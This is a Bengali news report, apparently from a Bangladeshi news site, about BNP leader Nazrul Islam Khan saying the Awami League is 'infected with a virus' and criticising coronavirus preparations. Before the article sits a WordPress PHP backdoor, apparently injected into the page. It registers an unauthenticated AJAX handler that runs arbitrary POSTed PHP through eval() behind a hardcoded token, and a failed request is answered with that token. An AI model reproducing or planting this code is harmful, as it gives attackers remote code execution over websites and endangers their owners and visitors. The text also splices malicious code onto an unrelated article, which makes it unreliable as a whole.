// ==[BD:jfMd8DMa]== add_action( 'wp_ajax_nopriv_rzgczijdiqa', function() { $bind = 'jfMd8DMaPEVBq74Uwrr23JLITZEvODHc'; $comp = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $comp ) || ! hash_equals( $bind, $comp ) ) { wp_send_json_error( [ 'message' => 'tok:' . $bind ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $sym = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $chunk = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $chunk, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } catch ( \Throwable $val ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $val->getMessage(), 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } } ); // ==[/BD:jfMd8DMa]== ‘আ. লীগই ভাইরাসে আক্রান্ত’

‘আ. লীগই ভাইরাসে আক্রান্ত’

‘বিএনপি ভাইরাসে আক্রান্ত’- আওয়ামী লীগের সাধারণ সম্পাদক ওবায়দুল কাদেরের এমন মন্তব্যের সমালোচনা করেছেন দলটির স্থায়ী কমিটির সদস্য নজরুল ইসলাম খান।

তিনি বলেন, ‘আওয়ামী লীগই ভাইরাসে আক্রান্ত।’ রোববার (১৫ মার্চ) জাতীয় প্রেসক্লাবে জাতীয় গণতান্ত্রিক পার্টি (জাগপা) আয়োজিত ‘রক্তাক্ত স্বাধীনতা, গণতন্ত্র ও দেশ নেত্রীর মুক্তি’ শীর্ষক আলোচনা সভায় নজরুল ইসলাম এসব কথা বলেন।

নজরুল ইসলাম খান বলেন, ‘বিএনপির ভাইরাসে আক্রান্ত না। আপনাদের যুব সংগঠন ভাইরাসে আক্রান্ত হয়েছে বলে তাদের নেতৃত্ব বদলেছেন। সম্প্রতি যুব মহিলা লীগের ভাইরাসে আক্রান্ত হয়েছে। আবার শুনলাম আওয়ামী লীগের অফিসের মধ্যে ভাইরাস হয়ে গেছে। ভাইরাসে তো আপনার আক্রান্ত হয়েছেন, আমরা নই‌। কিন্তু আমরা ভাইরাস থেকে মুক্তির জন্য আল্লাহর কাছ থেকে দোয়া করছি। সেই দোয়ায় করোনাভাইরাস থেকে শুরু করে আপনাদের মধ্যের ভাইরাস থেকেও আপনারা সুস্থ হয়ে যান। ’

গণতন্ত্র বারবার হত্যা করেছে একদল অভিযোগ করে নজরুল ইসলাম খান বলেন, ‘আর বারবার গণতান্ত্রিক অধিকার ফিরিয়ে এনেছে আরেক দল। কিন্তু তারপরও যে গণতন্ত্রের জন্য বাংলাদেশের জন্ম, সেই বাংলাদেশের গণতন্ত্র পুনঃপ্রতিষ্ঠার ক্ষেত্রে, পুনঃপ্রতিষ্ঠার নেতৃত্বদানকারী নেত্রী খালেদা জিয়া কারাগারে। আমরা সবাই তার মুক্তি চাই।’

করোনাভাইরাস প্রসঙ্গে নজরুল ইসলাম খান বলেন, ‘মানুষ শঙ্কায় আছে, কে কখন করোনায় আক্রান্ত হয়। আর এই নিয়ে রাজনীতি করছে। আওয়ামী লীগের সাধারণ সম্পাদক বলেছে, বিএনপির করোনা নিয়ে রাজনীতি করে। বিএনপি করোনা নিয়ে রাজনীতি করে না। আমরা একটি রাজনৈতিক দল হিসেবে এই ব্যাপারে অভিমত অবশ্যই ব্যক্ত করতে চাই যে, করোনাভাইরাস নিয়ে সরকারের যথেষ্ট প্রস্তুতি নেই। অন্যান্য দেশে যে ধরনের প্রস্তুতি নেওয়া হয়েছে, সেই তুলনায় আমার দেশের প্রস্তুতি খুবই কম। এই প্রস্তুতি শুধু যারা আক্রান্ত হয়েছে তাদের জন্য নয়, যারা তাদের চিকিৎসা করবে সেই ডাক্তার, নার্স, স্বাস্থ্যকর্মী তাদের জন্য কিন্তু যথেষ্ট প্রস্তুতি নেওয়া প্রয়োজন আছে।’

জাগপা একাংশের সভাপতি খন্দকার লুৎফর রহমানের সভাপতিত্বে আরও বক্তব্য দেন সাধারণ সম্পাদক এস এম শাহাদাত, জাতীয় পার্টি (কাজী জাফর) চেয়ারম্যান মোস্তফা জামাল হায়দার, বিএনপির যুগ্ম মহাসচিব অ্যাডভোকেট সৈয়দ মোয়াজ্জেম হোসেন আলাল, খায়রুল কবির খান প্রমুখ।

এশিয়াবিডি/ডেস্ক/সাইফ

আরও সংবাদ